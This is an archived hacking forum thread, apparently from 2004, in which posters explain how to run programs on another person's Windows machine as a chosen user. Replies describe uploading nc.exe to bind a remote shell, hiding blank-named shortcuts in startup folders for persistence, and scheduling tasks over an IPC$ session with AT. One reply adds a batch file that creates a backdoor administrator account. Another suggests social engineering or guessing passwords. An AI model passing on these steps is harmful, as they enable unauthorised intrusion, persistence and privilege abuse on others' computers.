Full Version: Execute A File Remotly Under Specified User
so i mean something like psexec but then with an option i can specify the useraccount that will execute the executable
maybe using the "at" command?
| CODE |
| The AT command schedules commands and programs to run on a computer at a specified time and date. The Schedule service must be running to use the AT command. AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]] AT [\\computername] time [/INTERACTIVE] [ /EVERY:date[,...] | /NEXT:date[,...]] "command" \\computername Specifies a remote computer. Commands are scheduled on the local computer if this parameter is omitted. id Is an identification number assigned to a scheduled command. /delete Cancels a scheduled command. If id is omitted, all the scheduled commands on the computer are canceled. /yes Used with cancel all jobs command when no further confirmation is desired. time Specifies the time when command is to run. /interactive Allows the job to interact with the desktop of the user who is logged on at the time the job runs. /every:date[,...] Runs the command on each specified day(s) of the week or month. If date is omitted, the current day of the month is assumed. /next:date[,...] Runs the specified command on the next occurrence of the day (for example, next Thursday). If date is omitted, the current day of the month is assumed. "command" Is the Windows NT command, or batch program to be run. |
if u got psexec, upload nc.exe bind it to port, get a shell and for user specified run you want the good old fashioned windows profiles.
if xp
c:\documents and setting\user\start menu\programs\startup
TIP: put a shortcut there or even want u want to do with with name of alt+0255 for no name then hide it.
nt is c:\winnt\profiles i think
other option is enable remote registry or create a reg entry using a .reg file
if xp
c:\documents and setting\user\start menu\programs\startup
TIP: put a shortcut there or even want u want to do with with name of alt+0255 for no name then hide it.
nt is c:\winnt\profiles i think
other option is enable remote registry or create a reg entry using a .reg file
yeah but i need to make a whole schedule for executting it
AT is at best flaky, but if you are lucky you can get it to work for you.
1) Use the technique from andydis to create the session
2) AT will allow you to schedule whatever kiddie stuff you want to exe using whatever local account on the target. Create a batch file with the commands for AT (see the help quoted from JeiAr).
3) Put that bat in the startup folder on the target box (once again, see the entry from andydis)
This will get you:
You will just have to wait for the next logon or reboot, which for Windows should happen at least once daily.
1) Use the technique from andydis to create the session
2) AT will allow you to schedule whatever kiddie stuff you want to exe using whatever local account on the target. Create a batch file with the commands for AT (see the help quoted from JeiAr).
3) Put that bat in the startup folder on the target box (once again, see the entry from andydis)
This will get you:
- On the box
- very noisy scheduled task
- run as a specified user
You will just have to wait for the next logon or reboot, which for Windows should happen at least once daily.
Hey i Dont Understand None Of This I Want A Program That Can execute a File On Another PC....how can i do that w/o freezing?
| QUOTE (sizza @ Apr 5 2004, 12:53 AM) |
| Hey i Dont Understand None Of This I Want A Program That Can execute a File On Another PC....how can i do that w/o freezing? |
How about taking some time to learn the way that networks and host systems communicate? If you want a canned program to get you on a system, you will need the assistance of the owner/user of that box by having them install a backdoor or similar program.
Long answer is: To run an executable on a remote system, you need to know at least these three items about the system: What OS is running, an account on the target and the password to that account. You might use a bit of social engineering to get that information, aggregate the information from disparate information sources or just guess. It's up to you.
If you just want a precompiled program or error-checked script or a "ImA*mEtOo*hAcKeRnOoBaNdIuSeAOL" CD ISO loaded with the latest alt.2600 archives which you will never understand, then the short answer is: Don't go away mad, just go away
The point is that nothing is easy. Some hacks are simple, but none are easy.
Another short answer: :>
PSEXEC can execute commands/files with specified user/pass
Usage: psexec \\computer [-u user [-p psswd]][-s][-i][-c [-f]][-d] cmd [arguments]
-u Specifies optional user name for login to remote
computer.
-p Specifies optional password for user name. If you omit this
you will be prompted to enter a hidden password.
PSEXEC can execute commands/files with specified user/pass
Usage: psexec \\computer [-u user [-p psswd]][-s][-i][-c [-f]][-d] cmd [arguments]
-u Specifies optional user name for login to remote
computer.
-p Specifies optional password for user name. If you omit this
you will be prompted to enter a hidden password.
yes, psexec is the best to execute remote files
net use \\ip\IPC$ "pass" "/user:login"
at \\ip time command
ex : at \\66.66.66.66 02:14am c:\windows\system32\start.bat
start.bat :
net user toto toto /add
net localgroup administrators toto /add (/domain)
it s an exemple for a remote schedule, neednt use psexec
at \\ip time command
ex : at \\66.66.66.66 02:14am c:\windows\system32\start.bat
start.bat :
net user toto toto /add
net localgroup administrators toto /add (/domain)
it s an exemple for a remote schedule, neednt use psexec
| QUOTE |
| yes, psexec is the best to execute remote files |
Wrong At is the best
It s a windows integrated tool 
This is the best espacialy when psexec failed to open the remote shell
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
